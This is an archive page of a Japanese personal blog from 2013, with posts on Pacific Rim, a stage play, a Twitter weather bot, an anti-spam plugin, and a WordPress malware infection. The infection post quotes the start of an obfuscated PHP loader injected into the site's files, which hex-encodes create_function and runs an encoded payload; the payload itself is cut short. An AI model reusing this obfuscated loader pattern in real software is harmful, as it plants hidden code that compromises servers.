てるてるブログ

てるてるぼうずの日常やらお勉強やら

5 / 23« Top...34567...101520...Last »

パシフィック・リム

Posted on | 8月 20, 2013 | No Comments

ギレルモ・デル・トロ監督のロボット映画。

日本のロボット物に影響を受けて製作したと言うだけあって、日本へのリスペクト精神がすごい!
ヒロインも日本人女性だし、出てくる怪獣たちもそのものずばり「KAIJU」と呼ばれてるぐらい。
日本での戦闘シーンが出てくるのは冒頭の短時間だけではあるけれど(どこか違和感のある街並ではあるけれど)ヒロインの幼少時役の芦田愛菜ちゃんの好演もあって結構印象的。

ストーリーは単純明快。
異世界(海の底にトンネルが!)からの敵を、人類の英知を結集した巨大ロボットで撃退するぞ!ってお話。
太平洋沿岸諸国がそれぞれにロボットを製造している設定なので、出てくる各国のロボットもかなり個性的!
個人的にはクリムゾン・タイフーンがお気に入り(チェルノも武骨でいいんだけどね)。

パイロットが複数人いてシンクロして闘うなんてどっかで見たような設定も楽しい。
パイロットの動きがそのままロボットに伝わるとかね…そりゃ「ロケットパ〜ンチ!」とか言いたくなるよね。

巨大ロボ好きの魂を揺さぶる映画でした。

ヴィーナス・イン・ファー/Venus in Fur

Posted on | 6月 25, 2013 | No Comments

シアターコクーンにて観劇の稲垣吾郎と中越典子の二人芝居。

トニー賞も受賞しているアメリカの舞台の翻訳版。
演出家も本家から…ではなく、本家の助手(?)の方を引っ張ってきての上演。
SMがテーマ!なんていった煽りのとおりになかなかに官能的で美しい舞台でしたけど、それだけでは収まらない人間同士や男女の関係の普遍的なテーマなんてのも含んだ深〜くてやや刺激的な作品でした。

Read more »

WordPress – ウィルス感染?

Posted on | 6月 19, 2013 | 2 Comment&trackback

わぷー

あ!っと言う間に6月です。
気がついたらTwitterの旧APIは停止してウィジェットが表示されなくなってるし、Wordpressはなにやらウィルス感染してるっぽいし…

このWordpressのウィルス(マルウェアっていうの?)、サーバー内のPHPファイルまるごと改ざんされてしまうようですね。
サーバーーバー上全てのPHPファイルということで、Wordpress内のPHPファイル以外のPHPファイルも同様に改ざんされています。
PHPファイルの冒頭に以下のような見慣れない文字列がダラダラと…

<?php $zend_framework=”\x63\162\x65\141\x75\156\x63\164\x69\157\x6e”; @error_reporting(0); $zend_framework(“”, “\x7d\73 (文字列省略……) \x4e\103\x6e\60\42\x29\51\x3b\x2f”); ?>

ついでにこれのせいなのかなんなのか、ログインすると管理画面の表示が崩れまくってなかなかカオスな状態にもなってます。
管理画面の表示崩れはとりあえずWordpressを最新バージョンにアップしてみたら戻りましたが、テーマフォルダのPHPファイルは全滅、プラグインもほとんど停止状態…なかなかにやる気を失う状態です。
Read more »

BOT作成メモ -お天気API・改-

Posted on | 4月 11, 2013 | No Comments

api

前にlivedoor天気情報のWeather HacksのAPIを使用してBOTに天気をつぶやかせる方法の記事を上げてたんですが、Weather HacksのAPIが仕様変更したらしく上手くつぶやかなくなってしまってました。
APIがJSONに変更になってたみたいですね。

TwitterのAPIもJSONさんメインになっちゃったし、世の中JSONさんの時代なんですかね…?
外部のAPIを使用するといきなりこうした仕様変更があるから油断出来ないですよね。
こまめに情報を収集してないと慌てることになりそう。
今のとこお遊びで使ってるだけだからいいけど、仕事とかで使うとなると大変そうだ。

とりあえず、今日の天気を定時につぶやくやつの修正をメモ↓
Read more »

WordPressプラグイン – SI CAPTCHA Anti-Spam

Posted on | 4月 8, 2013 | No Comments

スパムコメント対策のWordPressプラグイン「SI CAPTCHA Anti-Spam」を入れてみました。
コメント投稿時に画像認証を表示してくれるプラグイン。
画像認証

一応スパム対策用に「Akismit」も入れてるんですが、これスパムコメントが投稿される事自体は防いでくれないんですよね。
最近ちょっと放置気味なせいもあるんでしょうが、3日程度でスパムコメントが500件近くにもなってしまってることもしばしば。
ここまでくるとスパムかどうか確認してから削除…なんてのがめんどくさくなってもう大体が一括削除!
「Akismit」のブロック力はすごいと思うんですけどね(^^;)

インストールは管理画面の[プラグイン]>[新規追加]からできるのも簡単でよいですね。
これでスパムも減ってくれると嬉しいんだけど…しばらくは様子見です。

参考サイト
SI CAPTCHA Anti-Spam(コメント画像認証導入プラグイン)

« PREVNEXT »

About

てるぼうず

てるてるぼうずな日常やらお勉強やら

旧ブログ倉庫 »
旧ブログの記事をお探しの方はこちらから

Admin